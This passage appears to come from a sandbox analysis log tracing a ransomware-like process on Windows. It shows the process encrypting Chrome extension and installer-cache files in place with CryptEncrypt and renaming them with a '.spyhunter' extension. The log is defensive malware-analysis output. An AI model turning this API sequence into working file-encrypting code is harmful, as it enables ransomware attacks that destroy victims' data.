Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.spyhunter")) returned 1 [0137.425] GetProcessHeap () returned 0x2c0000 [0137.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.425] GetProcessHeap () returned 0x2c0000 [0137.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.425] GetProcessHeap () returned 0x2c0000 [0137.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d250 | out: hHeap=0x2c0000) returned 1 [0137.426] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f3e8 | out: pbBuffer=0x57f3e8) returned 1 [0137.426] GetProcessHeap () returned 0x2c0000 [0137.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.426] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f3e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f3e0*=0x30) returned 1 [0137.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.427] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json") returned 155 [0137.427] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.427] GetProcessHeap () returned 0x2c0000 [0137.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.427] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3a4*=0x103, lpOverlapped=0x0) returned 1 [0137.428] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.428] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x57f3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3a4*=0x103, lpOverlapped=0x0) returned 1 [0137.429] GetProcessHeap () returned 0x2c0000 [0137.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.429] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.429] WriteFile (in: hFile=0x18c, lpBuffer=0x57f3e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3a4, lpOverlapped=0x0 | out: lpBuffer=0x57f3e4*, lpNumberOfBytesWritten=0x57f3a4*=0x4, lpOverlapped=0x0) returned 1 [0137.429] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3a4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3a4*=0x30, lpOverlapped=0x0) returned 1 [0137.429] CloseHandle (hObject=0x18c) returned 1 [0137.429] GetProcessHeap () returned 0x2c0000 [0137.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.429] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.spyhunter") returned 165 [0137.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.spyhunter")) returned 1 [0137.430] GetProcessHeap () returned 0x2c0000 [0137.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.430] GetProcessHeap () returned 0x2c0000 [0137.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.431] GetProcessHeap () returned 0x2c0000 [0137.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6db80 | out: hHeap=0x2c0000) returned 1 [0137.431] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f3e8 | out: pbBuffer=0x57f3e8) returned 1 [0137.431] GetProcessHeap () returned 0x2c0000 [0137.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.431] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f3e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f3e0*=0x30) returned 1 [0137.431] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.439] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0137.440] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".txt") returned 0x0 [0137.440] GetProcessHeap () returned 0x2c0000 [0137.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.440] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3a4*=0x2800, lpOverlapped=0x0) returned 1 [0137.460] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.461] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3a4*=0x2800, lpOverlapped=0x0) returned 1 [0137.461] GetProcessHeap () returned 0x2c0000 [0137.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.461] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.461] WriteFile (in: hFile=0x18c, lpBuffer=0x57f3e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3a4, lpOverlapped=0x0 | out: lpBuffer=0x57f3e4*, lpNumberOfBytesWritten=0x57f3a4*=0x4, lpOverlapped=0x0) returned 1 [0137.461] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3a4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3a4*=0x30, lpOverlapped=0x0) returned 1 [0137.462] CloseHandle (hObject=0x18c) returned 1 [0137.462] GetProcessHeap () returned 0x2c0000 [0137.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.462] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.spyhunter") returned 156 [0137.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.spyhunter" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.spyhunter")) returned 1 [0137.463] GetProcessHeap () returned 0x2c0000 [0137.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.463] GetProcessHeap () returned 0x2c0000 [0137.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.463] GetProcessHeap () returned 0x2c0000 [0137.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7fb0 | out: hHeap=0x2c0000) returned 1 [0137.496] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f3d8 | out: pbBuffer=0x57f3d8) returned 1 [0137.496] GetProcessHeap () returned 0x2c0000 [0137.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0137.496] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f3d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f3d0*=0x30) returned 1 [0137.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html") returned 155 [0137.497] StrStrW (lpFirst="craw_window.html", lpSrch=".txt") returned 0x0 [0137.497] GetProcessHeap () returned 0x2c0000 [0137.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.497] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f394, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f394*=0x32a, lpOverlapped=0x0) returned 1 [0137.521] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffcd6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.521] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x32a, lpNumberOfBytesWritten=0x57f394, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f394*=0x32a, lpOverlapped=0x0) returned 1 [0137.521] GetProcessHeap () returned 0x2c0000 [0137.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.521] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.521] WriteFile (in: hFile=0x18c, lpBuffer=0x57f3d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f394, lpOverlapped=0x0 | out: lpBuffer=0x57f3d4*, lpNumberOfBytesWritten=0x57f394*=0x4, lpOverlapped=0x0) returned 1 [0137.521] WriteFile (in: hFile=0x18c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f394, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f394*=0x30, lpOverlapped=0x0) returned 1 [0137.521] CloseHandle (hObject=0x18c) returned 1 [0137.522] GetProcessHeap () returned 0x2c0000 [0137.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.522] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.spyhunter") returned 165 [0137.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.spyhunter")) returned 1 [0137.523] GetProcessHeap () returned 0x2c0000 [0137.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.523] GetProcessHeap () returned 0x2c0000 [0137.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0137.523] GetProcessHeap () returned 0x2c0000 [0137.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fd50 | out: hHeap=0x2c0000) returned 1 [0137.525] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f3d0 | out: pbBuffer=0x57f3d0) returned 1 [0137.525] GetProcessHeap () returned 0x2c0000 [0137.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0137.525] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f3c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f3c8*=0x30) returned 1 [0137.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json") returned 159 [0137.526] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.526] GetProcessHeap () returned 0x2c0000 [0137.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.526] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f38c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f38c*=0x269, lpOverlapped=0x0) returned 1 [0137.544] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffd97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.544] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x57f38c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f38c*=0x269, lpOverlapped=0x0) returned 1 [0137.544] GetProcessHeap () returned 0x2c0000 [0137.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.544] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.544] WriteFile (in: hFile=0x18c, lpBuffer=0x57f3cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f38c, lpOverlapped=0x0 | out: lpBuffer=0x57f3cc*, lpNumberOfBytesWritten=0x57f38c*=0x4, lpOverlapped=0x0) returned 1 [0137.544] WriteFile (in: hFile=0x18c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f38c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f38c*=0x30, lpOverlapped=0x0) returned 1 [0137.545] CloseHandle (hObject=0x18c) returned 1 [0137.545] GetProcessHeap () returned 0x2c0000 [0137.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.545] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.spyhunter") returned 169 [0137.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.spyhunter")) returned 1 [0137.546] GetProcessHeap () returned 0x2c0000 [0137.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.546] GetProcessHeap () returned 0x2c0000 [0137.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0137.546] GetProcessHeap () returned 0x2c0000 [0137.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80808 | out: hHeap=0x2c0000) returned 1 [0137.548] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f3c8 | out: pbBuffer=0x57f3c8) returned 1 [0137.548] GetProcessHeap () returned 0x2c0000 [0137.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0137.548] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f3c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f3c0*=0x30) returned 1 [0137.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json") returned 159 [0137.549] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.549] GetProcessHeap () returned 0x2c0000 [0137.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.549] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f384, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f384*=0x282, lpOverlapped=0x0) returned 1 [0137.560] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffd7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.560] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x57f384, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f384*=0x282, lpOverlapped=0x0) returned 1 [0137.560] GetProcessHeap () returned 0x2c0000 [0137.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.560] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.560] WriteFile (in: hFile=0x18c, lpBuffer=0x57f3c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f384, lpOverlapped=0x0 | out: lpBuffer=0x57f3c4*, lpNumberOfBytesWritten=0x57f384*=0x4, lpOverlapped=0x0) returned 1 [0137.560] WriteFile (in: hFile=0x18c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f384, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f384*=0x30, lpOverlapped=0x0) returned 1 [0137.560] CloseHandle (hObject=0x18c) returned 1 [0137.561] GetProcessHeap () returned 0x2c0000 [0137.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.561] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.spyhunter") returned 169 [0137.561] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.spyhunter")) returned 1 [0137.562] GetProcessHeap () returned 0x2c0000 [0137.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.562] GetProcessHeap () returned 0x2c0000 [0137.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0137.562] GetProcessHeap () returned 0x2c0000 [0137.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80370 | out: hHeap=0x2c0000) returned 1 [0137.563] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f3c0 | out: pbBuffer=0x57f3c0) returned 1 [0137.564] GetProcessHeap () returned 0x2c0000 [0137.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 